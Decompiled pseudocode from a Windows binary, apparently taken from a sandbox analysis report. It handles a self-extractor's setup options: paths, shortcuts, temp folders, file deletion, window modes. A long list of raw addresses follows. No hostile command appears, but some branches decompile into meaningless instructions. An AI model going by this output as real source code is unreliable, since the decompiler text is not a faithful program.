                						__ebx = __edi;
                						__eflags = __ax;
                						if(__ax == 0) {
                							L159:
                							__esi = 0x800;
                							goto L160;
                						}
                						L143:
                						__edi = __ax & 0x0000ffff;
                						do {
                							L144:
                							__eax = 0x20;
                							__eflags = __di - __ax;
                							if(__di == __ax) {
                								L146:
                								__eax = 0;
                								__esi->i = __ax;
                								__ebp - 0x688c = E003DA231(__ebp - 0x688c);
                								__eflags = __al;
                								if(__al == 0) {
                									L155:
                									__esi->i = __di;
                									goto L156;
                								}
                								L147:
                								__ebp - 0x688c = E003DA243(__ebp - 0x688c);
                								__eax = E003DA28F(__eax);
                								__eflags = __al;
                								if(__al != 0) {
                									goto L155;
                								}
                								L148:
                								__ecx = 0x2f;
                								__eax =  &(__esi->i);
                								__ebx = __esi;
                								__eflags = __di - __cx;
                								if(__di != __cx) {
                									L150:
                									__esi = __eax;
                									__eax = 0x20;
                									while(1) {
                										L152:
                										__eflags = __esi->i - __ax;
                										if(__esi->i != __ax) {
                											break;
                										}
                										L151:
                										__esi =  &(__esi->i);
                										__eflags = __esi;
                									}
                									L153:
                									__ecx = __ebp - 0x1844;
                									__eax = __esi;
                									__edx = 0x400;
                									L154:
                									__eax = E003E0602(__ecx, __eax, __edx);
                									 *__ebx = __di;
                									goto L156;
                								}
                								L149:
                								 *(__ebp - 0x1844) = __cx;
                								__edx = 0x3ff;
                								__ecx = __ebp - 0x1842;
                								goto L154;
                							}
                							L145:
                							__eax = 0x2f;
                							__eflags = __di - __ax;
                							if(__di != __ax) {
                								goto L156;
                							}
                							goto L146;
                							L156:
                							__esi =  &(__esi->i);
                							__eax = __esi->i & 0x0000ffff;
                							__edi = __esi->i & 0x0000ffff;
                							__eflags = __ax;
                						} while (__ax != 0);
                						__esi = 0x800;
                						__eflags = __ebx;
                						if(__ebx != 0) {
                							__eax = 0;
                							 *__ebx = __ax;
                						}
                						goto L160;
                					} else {
                						L139:
                						__ebp - 0x19892 = __ebp - 0x688c;
                						E003E0602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
                						_push(__ebp - 0x688a);
                						__eax = E003F22C6(__ecx);
                						_pop(__ecx);
                						__ecx = __ebx;
                						__eflags = __eax;
                						if(__eax != 0) {
                							__ecx = 0;
                							 *__eax = __cx;
                							__ebp - 0x1844 = E003E0602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
                						}
                						L160:
                						__eflags =  *((short*)(__ebp - 0x11894));
                						if( *((short*)(__ebp - 0x11894)) != 0) {
                							__ebp - 0x9894 = __ebp - 0x11894;
                							__eax = E003DB6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
                						}
                						__ebp - 0xb894 = __ebp - 0x688c;
                						__eax = E003DB6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
                						__eflags =  *(__ebp - 0x2844);
                						if(__eflags == 0) {
                							__ebp - 0x2844 = E003EB425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
                						}
                						__ebp - 0x2844 = E003DB690(__eflags, __ebp - 0x2844, __esi);
                						__eflags =  *((short*)(__ebp - 0x17894));
                						if(__eflags != 0) {
                							__ebp - 0x17894 = __ebp - 0x2844;
                							E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
                							__eax = E003DB690(__eflags, __ebp - 0x2844, __esi);
                						}
                						__ebp - 0x2844 = __ebp - 0xc894;
                						__eax = E003E0602(__ebp - 0xc894, __ebp - 0x2844, __esi);
                						__eflags =  *(__ebp - 0x13894);
                						__eax = __ebp - 0x13894;
                						if(__eflags == 0) {
                							__eax = __ebp - 0x19894;
                						}
                						__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
                						__eax = __ebp - 0x2844;
                						__eflags = E003DB92D(__ebp - 0x2844);
                						if(__eflags == 0) {
                							L170:
                							__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
                							goto L171;
                						} else {
                							L169:
                							__eflags = __eax;
                							if(__eflags == 0) {
                								L171:
                								__ebx = 0;
                								__ebp - 0x2844 = E003DA0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
                								__ebp - 0xb894 = __ebp - 0xa894;
                								E003E0602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
                								__eax = E003DC2E4(__eflags, __ebp - 0xa894);
                								__esi =  *(__ebp - 0x1844) & 0x0000ffff;
                								__eax = __ebp - 0x1844;
                								__edx =  *(__ebp - 0x9894) & 0x0000ffff;
                								__edi = __ebp - 0xa894;
                								__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
                								__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
                								asm("sbb esi, esi");
                								__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
                								__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
                								__eax = __ebp - 0x9894;
                								asm("sbb edx, edx");
                								__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
                								__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
                								__eax = __ebp - 0x15894;
                								asm("sbb ecx, ecx");
                								__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
                								 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
                								asm("sbb eax, eax");
                								 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
                								__ebp - 0xb894 = E003EA48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
                								__eflags =  *(__ebp - 0xc894) - __bx;
                								if( *(__ebp - 0xc894) != __bx) {
                									__eax = __ebp - 0xc894;
                									__eax =  *0x43308c(0x1000, 5, __ebp - 0xc894, 0);
                								}
                								while(1) {
                									L175:
                									_push(0x1000);
                									_t213 = _t297 - 0x15; // 0xffffa75f
                									_t214 = _t297 - 0xd; // 0xffffa767
                									_t215 = _t297 - 0x588c; // 0xffff4ee8
                									_t216 = _t297 - 0xf894; // 0xfffeaee0
                									_push( *((intOrPtr*)(_t297 + 0xc)));
                									_t225 = E003EB314(_t289, _t297);
                									_t277 =  *((intOrPtr*)(_t297 + 0x10));
                									 *((intOrPtr*)(_t297 + 0xc)) = _t225;
                									if(_t225 != 0) {
                										_t226 = _t297 - 0x588c;
                										_t292 = _t297 - 0x1b894;
                										_t290 = 6;
                										goto L2;
                									} else {
                										break;
                									}
                									L4:
                									while(E003E1FBB(_t297 - 0xf894,  *((intOrPtr*)(0x40e744 + _t293 * 4))) != 0) {
                										_t293 = _t293 + 1;
                										if(_t293 < 0xe) {
                											continue;
                										} else {
                											goto L175;
                										}
                									}
                									__eflags = _t293 - 0xd;
                									if(_t293 > 0xd) {
                										continue;
                									}
                									L8:
                									switch( *((intOrPtr*)(_t293 * 4 +  &M003ED41B))) {
                										case 0:
                											L9:
                											__eflags = _t277 - 2;
                											if(_t277 == 2) {
                												_t289 = 0x800;
                												E003EA64D(_t297 - 0x788c, 0x800);
                												E003DA544(E003DBDF3(__eflags, _t297 - 0x788c, _t297 - 0x588c, _t297 - 0xd894, 0x800), _t277, _t297 - 0x8894, _t293);
                												 *(_t297 - 4) = 0;
                												E003DA67E(_t297 - 0x8894, _t297 - 0xd894);
                												E003D6EDB(_t297 - 0x388c);
                												while(1) {
                													L23:
                													_push(0);
                													_t240 = E003DA5D1(_t297 - 0x8894, _t297 - 0x388c);
                													__eflags = _t240;
                													if(_t240 == 0) {
                														break;
                													}
                													L11:
                													SetFileAttributesW(_t297 - 0x388c, 0);
                													__eflags =  *(_t297 - 0x2880);
                													if(__eflags == 0) {
                														L16:
                														_t244 = GetFileAttributesW(_t297 - 0x388c);
                														__eflags = _t244 - 0xffffffff;
                														if(_t244 == 0xffffffff) {
                															continue;
                														}
                														L17:
                														_t246 = DeleteFileW(_t297 - 0x388c);
                														__eflags = _t246;
                														if(_t246 != 0) {
                															continue;
                														} else {
                															_t295 = 0;
                															_push(0);
                															goto L20;
                															L20:
                															E003D4092(_t297 - 0x1044, _t289, L"%s.%d.tmp", _t297 - 0x388c);
                															_t299 = _t299 + 0x14;
                															_t251 = GetFileAttributesW(_t297 - 0x1044);
                															__eflags = _t251 - 0xffffffff;
                															if(_t251 != 0xffffffff) {
                																_t295 = _t295 + 1;
                																__eflags = _t295;
                																_push(_t295);
                																goto L20;
                															} else {
                																_t254 = MoveFileW(_t297 - 0x388c, _t297 - 0x1044);
                																__eflags = _t254;
                																if(_t254 != 0) {
                																	MoveFileExW(_t297 - 0x1044, 0, 4);
                																}
                																continue;
                															}
                														}
                													}
                													L12:
                													E003DB991(__eflags, _t297 - 0x788c, _t297 - 0x1044, _t289);
                													E003DB690(__eflags, _t297 - 0x1044, _t289);
                													_t296 = E003F3E13(_t297 - 0x788c);
                													__eflags = _t296 - 4;
                													if(_t296 < 4) {
                														L14:
                														_t265 = E003DBDB4(_t297 - 0x588c);
                														__eflags = _t265;
                														if(_t265 != 0) {
                															break;
                														}
                														L15:
                														_t268 = E003F3E13(_t297 - 0x388c);
                														__eflags = 0;
                														 *((short*)(_t297 + _t268 * 2 - 0x388a)) = 0;
                														E003EFFF0(_t289, _t297 - 0x44, 0, 0x1e);
                														_t299 = _t299 + 0x10;
                														 *((intOrPtr*)(_t297 - 0x40)) = 3;
                														_push(0x14);
                														_pop(_t271);
                														 *((short*)(_t297 - 0x34)) = _t271;
                														 *((intOrPtr*)(_t297 - 0x3c)) = _t297 - 0x388c;
                														_push(_t297 - 0x44);
                														 *0x43307c();
                														goto L16;
                													}
                													L13:
                													_t276 = E003F3E13(_t297 - 0x1044);
                													__eflags = _t296 - _t276;
                													if(_t296 > _t276) {
                														goto L15;
                													}
                													goto L14;
                												}
                												L24:
                												 *(_t297 - 4) =  *(_t297 - 4) | 0xffffffff;
                												E003DA55A(_t297 - 0x8894);
                											}
                											goto L175;
                										case 1:
                											L25:
                											__eflags = __ebx;
                											if(__ebx != 0) {
                												goto L175;
                											} else {
                												__eax =  *0x42fc94;
                												__eflags = __eax;
                												__ebx = __ebx & 0xffffff00 | __eax == 0x00000000;
                												__eflags = __eax;
                												if(__eax != 0) {
                													__eax =  *0x42fc94;
                													_pop(__ecx);
                													_pop(__ecx);
                												}
                												__bh =  *((intOrPtr*)(__ebp - 0xd));
                												__eflags = __bh;
                												if(__eflags == 0) {
                													__eax = __ebp + 0xc;
                													_push(__ebp + 0xc);
                													__esi = E003EB48E(__ecx, __edx, __eflags);
                													__eax =  *0x42fc94;
                												} else {
                													__esi = __ebp - 0x588c;
                												}
                												__eflags = __bl;
                												if(__bl == 0) {
                													__edi = __eax;
                												}
                												L33:
                												__eax = E003F3E13(__esi);
                												__eax = __eax + __edi;
                												_push(__eax);
                												_push( *0x42fc94);
                												__eax = E003F3E3E(__ecx, __edx);
                												__esp = __esp + 0xc;
                												__eflags = __eax;
                												if(__eax == 0) {
                													L37:
                													__eflags = __bh;
                													if(__bh == 0) {
                														__eax = L003F3E2E(__esi);
                													}
                													goto L175;
                												}
                												L34:
                												 *0x42fc94 = __eax;
                												__eflags = __bl;
                												if(__bl != 0) {
                													__ecx = 0;
                													__eflags = 0;
                													 *__eax = __cx;
                												}
                												L36:
                												__eax = E003F7686(__eax, __esi);
                												_pop(__ecx);
                												_pop(__ecx);
                												goto L37;
                											}
                										case 2:
                											L39:
                											__eflags = __ebx;
                											if(__ebx == 0) {
                												__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
                											}
                											goto L175;
                										case 3:
                											L41:
                											__eflags = __ebx;
                											if(__ebx != 0) {
                												goto L175;
                											}
                											L42:
                											__eflags =  *0x41a472 - __di;
                											if( *0x41a472 != __di) {
                												goto L175;
                											}
                											L43:
                											__eax = 0;
                											__edi = __ebp - 0x588c;
                											_push(0x22);
                											 *(__ebp - 0x1044) = __ax;
                											_pop(__eax);
                											__eflags =  *(__ebp - 0x588c) - __ax;
                											if( *(__ebp - 0x588c) == __ax) {
                												__edi = __ebp - 0x588a;
                											}
                											__eax = E003F3E13(__edi);
                											__esi = 0x800;
                											__eflags = __eax - 0x800;
                											if(__eax >= 0x800) {
                												goto L175;
                											} else {
                												L46:
                												__eax =  *__edi & 0x0000ffff;
                												_push(0x5c);
                												_pop(__ecx);
                												__eflags = ( *__edi & 0x0000ffff) - 0x2e;
                												if(( *__edi & 0x0000ffff) != 0x2e) {
                													L50:
                													__eflags = __ax - __cx;
                													if(__ax == __cx) {
                														L62:
                														__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, __esi);
                														__ebx = 0;
                														__eflags = 0;
                														L63:
                														_push(0x22);
                														_pop(__eax);
                														__eax = __ebp - 0x1044;
                														__eax = E003F279B(__ebp - 0x1044, __ebp - 0x1044);
                														_pop(__ecx);
                														_pop(__ecx);
                														__eflags = __eax;
                														if(__eax != 0) {
                															__eflags =  *(__eax + 2) - __bx;
                															if( *(__eax + 2) == __bx) {
                																__ecx = 0;
                																__eflags = 0;
                																 *__eax = __cx;
                															}
                														}
                														__eax = __ebp - 0x1044;
                														__edi = 0x41a472;
                														E003E0602(0x41a472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
                														__eax = E003EB1BE(__ebp - 0x1044, __esi);
                														__esi = GetDlgItem( *(__ebp + 8), 0x66);
                														__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
                														__eax = SendMessageW(__esi, 0x143, __ebx, 0x41a472); // executed
                														__eax = __ebp - 0x1044;
                														__eax = E003F3E49(__ebp - 0x1044, 0x41a472, __eax);
                														_pop(__ecx);
                														_pop(__ecx);
                														__eflags = __eax;
                														if(__eax != 0) {
                															__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
                														}
                														goto L175;
                													}
                													L51:
                													__eflags = __ax;
                													if(__ax == 0) {
                														L53:
                														__eax = __ebp - 0x1c;
                														__ebx = 0;
                														_push(__ebp - 0x1c);
                														_push(1);
                														_push(0);
                														_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
                														_push(0x80000002);
                														__eax =  *0x433028();
                														__eflags = __eax;
                														if(__eax == 0) {
                															__eax = __ebp - 0x14;
                															 *(__ebp - 0x14) = 0x1000;
                															_push(__ebp - 0x14);
                															__eax = __ebp - 0x1044;
                															_push(__ebp - 0x1044);
                															__eax = __ebp - 0x24;
                															_push(__ebp - 0x24);
                															_push(0);
                															_push(L"ProgramFilesDir");
                															_push( *(__ebp - 0x1c));
                															__eax =  *0x433024();
                															_push( *(__ebp - 0x1c));
                															 *0x433008() =  *(__ebp - 0x14);
                															__ecx = 0x7ff;
                															__eax =  *(__ebp - 0x14) >> 1;
                															__eflags = __eax - 0x7ff;
                															if(__eax >= 0x7ff) {
                																__eax = 0x7ff;
                															}
                															__ecx = 0;
                															__eflags = 0;
                															 *(__ebp + __eax * 2 - 0x1044) = __cx;
                														}
                														__eflags =  *(__ebp - 0x1044) - __bx;
                														if( *(__ebp - 0x1044) != __bx) {
                															__eax = __ebp - 0x1044;
                															__eax = E003F3E13(__ebp - 0x1044);
                															_push(0x5c);
                															_pop(__ecx);
                															__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
                															if(__eflags != 0) {
                																__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, "\\", __esi);
                															}
                														}
                														__esi = E003F3E13(__edi);
                														__eax = __ebp - 0x1044;
                														__eflags = __esi - 0x7ff;
                														__esi = 0x800;
                														if(__eflags < 0) {
                															__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, __edi, 0x800);
                														}
                														goto L63;
                													}
                													L52:
                													__eflags =  *((short*)(__edi + 2)) - 0x3a;
                													if( *((short*)(__edi + 2)) == 0x3a) {
                														goto L62;
                													}
                													goto L53;
                												}
                												L47:
                												__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
                												if( *((intOrPtr*)(__edi + 2)) != __cx) {
                													goto L51;
                												}
                												L48:
                												__edi = __edi + 4;
                												__ebx = 0;
                												__eflags =  *__edi - __bx;
                												if( *__edi == __bx) {
                													goto L175;
                												}
                												L49:
                												__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, 0x800);
                												goto L63;
                											}
                										case 4:
                											L68:
                											__eflags =  *0x41a46c - 1;
                											__eflags = __eax - 0x41a46c;
                											 *__edi =  *__edi + __ecx;
                											__eflags =  *(__edx + 7) & __al;
                											 *__eax =  *__eax + __al;
                											__eflags =  *__eax;
                										case 5:
                											L73:
                											__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                											__ecx = 0;
                											__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                											__eflags = __eax;
                											if(__eax == 0) {
                												L80:
                												 *0x418457 = __cl;
                												 *0x418460 = 1;
                												goto L175;
                											}
                											L74:
                											__eax = __eax - 0x30;
                											__eflags = __eax;
                											if(__eax == 0) {
                												L78:
                												 *0x418457 = __cl;
                												L79:
                												 *0x418460 = __cl;
                												goto L175;
                											}
                											L75:
                											__eax = __eax - 1;
                											__eflags = __eax;
                											if(__eax == 0) {
                												goto L80;
                											}
                											L76:
                											__eax = __eax - 1;
                											__eflags = __eax;
                											if(__eax != 0) {
                												goto L175;
                											}
                											L77:
                											 *0x418457 = 1;
                											goto L79;
                										case 6:
                											L86:
                											__edi = 0;
                											 *0x41c577 = 1;
                											__edi = 1;
                											__eax = __ebp - 0x588c;
                											__eflags =  *(__ebp - 0x588c) - 0x3c;
                											__ebx = __esi;
                											 *(__ebp - 0x14) = __eax;
                											if( *(__ebp - 0x588c) != 0x3c) {
                												L97:
                												__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
                												if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
                													L100:
                													__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
                													if( *((intOrPtr*)(__ebp + 0x10)) != 4) {
                														goto L175;
                													}
                													L101:
                													__eflags = __ebx - 6;
                													if(__ebx != 6) {
                														goto L175;
                													}
                													L102:
                													__ecx = 0;
                													__eflags = 0;
                													_push(0);
                													L103:
                													_push(__edi);
                													_push(__eax);
                													_push( *(__ebp + 8));
                													__eax = E003ED78F(__ebp);
                													goto L175;
                												}
                												L98:
                												__eflags = __ebx - 9;
                												if(__ebx != 9) {
                													goto L175;
                												}
                												L99:
                												_push(1);
                												goto L103;
                											}
                											L87:
                											__eax = __ebp - 0x588a;
                											_push(0x3e);
                											_push(__ebp - 0x588a);
                											__eax = E003F22C6(__ecx);
                											_pop(__ecx);
                											_pop(__ecx);
                											__eflags = __eax;
                											if(__eax == 0) {
                												L96:
                												__eax =  *(__ebp - 0x14);
                												goto L97;
                											}
                											L88:
                											_t103 = __eax + 2; // 0x2
                											__ecx = _t103;
                											 *(__ebp - 0x14) = _t103;
                											__ecx = 0;
                											 *__eax = __cx;
                											__eax = __ebp - 0x10c;
                											_push(0x64);
                											_push(__ebp - 0x10c);
                											__eax = __ebp - 0x588a;
                											_push(__ebp - 0x588a);
                											__eax = E003EAF98();
                											 *(__ebp - 0x20) = __eax;
                											__eflags = __eax;
                											if(__eax == 0) {
                												goto L96;
                											}
                											L89:
                											__esi = __eax;
                											while(1) {
                												L90:
                												__eflags =  *(__ebp - 0x10c);
                												if( *(__ebp - 0x10c) == 0) {
                													goto L96;
                												}
                												L91:
                												__eax = __ebp - 0x10c;
                												__eax = E003E1FBB(__ebp - 0x10c, L"HIDE");
                												__eax =  ~__eax;
                												asm("sbb eax, eax");
                												__edi = __edi & __eax;
                												__eax = __ebp - 0x10c;
                												__eax = E003E1FBB(__ebp - 0x10c, L"MAX");
                												__eflags = __eax;
                												if(__eax == 0) {
                													_push(3);
                													_pop(__edi);
                												}
                												__eax = __ebp - 0x10c;
                												__eax = E003E1FBB(__ebp - 0x10c, L"MIN");
                												__eflags = __eax;
                												if(__eax == 0) {
                													_push(6);
                													_pop(__edi);
                												}
                												_push(0x64);
                												__eax = __ebp - 0x10c;
                												_push(__ebp - 0x10c);
                												_push(__esi);
                												__esi = E003EAF98();
                												__eflags = __esi;
                												if(__esi != 0) {
                													continue;
                												} else {
                													goto L96;
                												}
                											}
                											goto L96;
                										case 7:
                											L107:
                											__eflags = __ebx - 1;
                											if(__eflags != 0) {
                												L124:
                												__eflags = __ebx - 7;
                												if(__ebx == 7) {
                													__eflags =  *0x41a46c - __edi;
                													if( *0x41a46c == __edi) {
                														 *0x41a46c = 2;
                													}
                													 *0x419468 = 1;
                												}
                												goto L175;
                											}
                											L108:
                											__eax = __ebp - 0x788c;
                											__edi = 0x800;
                											GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
                											__eax = E003DB690(__eflags, __ebp - 0x788c, 0x800);
                											__ebx = 0;
                											__esi = 0;
                											_push(0);
                											while(1) {
                												L110:
                												_push( *0x40e724);
                												__ebp - 0x788c = E003D4092(0x41946a, __edi, L"%s%s%u", __ebp - 0x788c);
                												__eax = E003DA231(0x41946a);
                												__eflags = __al;
                												if(__al == 0) {
                													break;
                												}
                												L109:
                												__esi =  &(__esi->i);
                												__eflags = __esi;
                												_push(__esi);
                											}
                											L111:
                											__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x41946a);
                											__eflags =  *(__ebp - 0x588c) - __bx;
                											if( *(__ebp - 0x588c) == __bx) {
                												goto L175;
                											}
                											L112:
                											__eflags =  *0x41c575 - __bl;
                											if( *0x41c575 != __bl) {
                												goto L175;
                											}
                											L113:
                											__eax = 0;
                											 *(__ebp - 0x444) = __ax;
                											__eax = __ebp - 0x588c;
                											_push(0x2c);
                											_push(__ebp - 0x588c);
                											__eax = E003F22C6(__ecx);
                											_pop(__ecx);
                											_pop(__ecx);
                											__eflags = __eax;
                											if(__eax != 0) {
                												L120:
                												__eflags =  *(__ebp - 0x444) - __bx;
                												if( *(__ebp - 0x444) == __bx) {
                													__ebp - 0x1b894 = __ebp - 0x588c;
                													E003E0602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
                													__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x19894, 0x200);
                												}
                												__ebp - 0x588c = E003EADD2(__ebp - 0x588c);
                												__eax = 0;
                												 *(__ebp - 0x488c) = __ax;
                												__ebp - 0x444 = __ebp - 0x588c;
                												__eax = E003EA7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
                												__eflags = __eax - 6;
                												if(__eax != 6) {
                													__eax = 0;
                													 *0x418454 = 1;
                													 *0x41946a = __ax;
                													__eax = EndDialog( *(__ebp + 8), 1);
                												}
                												goto L175;
                											}
                											L114:
                											__ax =  *(__ebp - 0x588c);
                											__esi = __ebx;
                											__eflags = __ax;
                											if(__ax == 0) {
                												goto L120;
                											}
                											L115:
                											__ecx = __ax & 0x0000ffff;
                											while(1) {
                												L116:
                												__eflags = __cx - 0x40;
                												if(__cx == 0x40) {
                													break;
                												}
                												L117:
                												__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
                												__esi =  &(__esi->i);
                												__ecx = __eax;
                												__eflags = __ax;
                												if(__ax != 0) {
                													continue;
                												}
                												L118:
                												goto L120;
                											}
                											L119:
                											__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
                											__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x444, 0x200);
                											__eax = 0;
                											__eflags = 0;
                											 *(__ebp + __esi * 2 - 0x588c) = __ax;
                											goto L120;
                										case 8:
                											L128:
                											__eflags = __ebx - 3;
                											if(__ebx == 3) {
                												__eflags =  *(__ebp - 0x588c) - __di;
                												if(__eflags != 0) {
                													__eax = __ebp - 0x588c;
                													_push(__ebp - 0x588c);
                													__eax = E003F7625(__ebx, __edi);
                													_pop(__ecx);
                													 *0x42fc9c = __eax;
                												}
                												__eax = __ebp + 0xc;
                												_push(__ebp + 0xc);
                												 *0x42fc98 = E003EB48E(__ecx, __edx, __eflags);
                											}
                											 *0x41c576 = 1;
                											goto L175;
                										case 9:
                											goto L0;
                										case 0xa:
                											L173:
                											__eflags = __ebx - 7;
                											if(__ebx == 7) {
                												 *0x41a470 = 1;
                											}
                											goto L175;
                										case 0xb:
                											L81:
                											__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                											__eax = E003F79E9( *(__ebp - 0x588c) & 0x0000ffff);
                											__eflags = __eax - 0x46;
                											if(__eax == 0x46) {
                												 *0x418461 = 1;
                											} else {
                												__eflags = __eax - 0x55;
                												if(__eax == 0x55) {
                													 *0x418462 = 1;
                												} else {
                													__eax = 0;
                													 *0x418461 = __al;
                													 *0x418462 = __al;
                												}
                											}
                											goto L175;
                										case 0xc:
                											L104:
                											 *0x427b7a = 1;
                											__eax = __eax + 0x427b7a;
                											_t117 = __esi + 0x39;
                											 *_t117 =  *(__esi + 0x39) + __esp;
                											__eflags =  *_t117;
                											__ebp = 0xffffa774;
                											if( *_t117 != 0) {
                												_t119 = __ebp - 0x588c; // 0xffff4ee8
                												__eax = _t119;
                												 *0x40e728 = E003E1FA7(_t119);
                											}
                											goto L175;
                									}
                									L2:
                									_push(0x1000);
                									_push(_t292);
                									_push(_t226);
                									_t226 = E003EAF98();
                									_t292 = _t292 + 0x2000;
                									_t290 = _t290 - 1;
                									if(_t290 != 0) {
                										goto L2;
                									} else {
                										_t293 = _t290;
                										goto L4;
                									}
                								}
                								L176:
                								 *[fs:0x0] =  *((intOrPtr*)(_t297 - 0xc));
                								return _t225;
                							}
                							goto L170;
                						}
                					}
                					goto L175;
                				}
                			}










                0x003ecba6
                0x003ecba6
                0x003ecb97
                0x003ecbb1
                0x003ecbb3
                0x003ecbc2
                0x003ecbc8
                0x003ecbce
                0x003ecbd9
                0x003ecbd9
                0x00000000
                0x003ecbce
                0x003ecb06
                0x003ecb06
                0x003ecb0b
                0x00000000
                0x00000000
                0x00000000
                0x003ecb0b
                0x003ecad1
                0x003ecad1
                0x003ecad5
                0x00000000
                0x00000000
                0x003ecad7
                0x003ecad7
                0x003ecada
                0x003ecadc
                0x003ecadf
                0x00000000
                0x00000000
                0x003ecae5
                0x003ecaee
                0x00000000
                0x003ecaee
                0x00000000
                0x003ecc8a
                0x003ecc8a
                0x003ecc8b
                0x003ecc90
                0x003ecc92
                0x003ecc95
                0x003ecc95
                0x00000000
                0x003ecccb
                0x003ecccb
                0x003eccd2
                0x003eccd4
                0x003eccd4
                0x003eccd6
                0x003ecd05
                0x003ecd05
                0x003ecd0b
                0x00000000
                0x003ecd0b
                0x003eccd8
                0x003eccd8
                0x003eccd8
                0x003eccdb
                0x003eccf4
                0x003eccf4
                0x003eccfa
                0x003eccfa
                0x00000000
                0x003eccfa
                0x003eccdd
                0x003eccdd
                0x003eccdd
                0x003ecce0
                0x00000000
                0x00000000
                0x003ecce2
                0x003ecce2
                0x003ecce2
                0x003ecce5
                0x00000000
                0x00000000
                0x003ecceb
                0x003ecceb
                0x00000000
                0x00000000
                0x003ecd58
                0x003ecd58
                0x003ecd5a
                0x003ecd61
                0x003ecd62
                0x003ecd68
                0x003ecd70
                0x003ecd72
                0x003ecd75
                0x003ece25
                0x003ece25
                0x003ece29
                0x003ece38
                0x003ece38
                0x003ece3c
                0x00000000
                0x00000000
                0x003ece42
                0x003ece42
                0x003ece45
                0x00000000
                0x00000000
                0x003ece4b
                0x003ece4b
                0x003ece4b
                0x003ece4d
                0x003ece4e
                0x003ece4e
                0x003ece4f
                0x003ece50
                0x003ece53
                0x00000000
                0x003ece53
                0x003ece2b
                0x003ece2b
                0x003ece2e
                0x00000000
                0x00000000
                0x003ece34
                0x003ece34
                0x00000000
                0x003ece34
                0x003ecd7b
                0x003ecd7b
                0x003ecd81
                0x003ecd83
                0x003ecd84
                0x003ecd89
                0x003ecd8a
                0x003ecd8b
                0x003ecd8d
                0x003ece22
                0x003ece22
                0x00000000
                0x003ece22
                0x003ecd93
                0x003ecd93
                0x003ecd93
                0x003ecd96
                0x003ecd99
                0x003ecd9b
                0x003ecd9e
                0x003ecda4
                0x003ecda6
                0x003ecda7
                0x003ecdad
                0x003ecdae
                0x003ecdb3
                0x003ecdb6
                0x003ecdb8
                0x00000000
                0x00000000
                0x003ecdba
                0x003ecdba
                0x003ecdbc
                0x003ecdbc
                0x003ecdbc
                0x003ecdc4
                0x00000000
                0x00000000
                0x003ecdc6
                0x003ecdcb
                0x003ecdd2
                0x003ecdd7
                0x003ecdde
                0x003ecde0
                0x003ecde2
                0x003ecde9
                0x003ecdee
                0x003ecdf0
                0x003ecdf2
                0x003ecdf4
                0x003ecdf4
                0x003ecdfa
                0x003ece01
                0x003ece06
                0x003ece08
                0x003ece0a
                0x003ece0c
                0x003ece0c
                0x003ece0d
                0x003ece0f
                0x003ece15
                0x003ece16
                0x003ece1c
                0x003ece1e
                0x003ece20
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ece20
                0x00000000
                0x00000000
                0x003ece87
                0x003ece87
                0x003ece8a
                0x003ed009
                0x003ed009
                0x003ed00c
                0x003ed012
                0x003ed018
                0x003ed01a
                0x003ed01a
                0x003ed024
                0x003ed024
                0x00000000
                0x003ed00c
                0x003ece90
                0x003ece90
                0x003ece96
                0x003ecea4
                0x003eceab
                0x003eceb0
                0x003eceb2
                0x003eceb4
                0x003eceb9
                0x003eceb9
                0x003eceb9
                0x003eced1
                0x003ecede
                0x003ecee3
                0x003ecee5
                0x00000000
                0x00000000
                0x003eceb7
                0x003eceb7
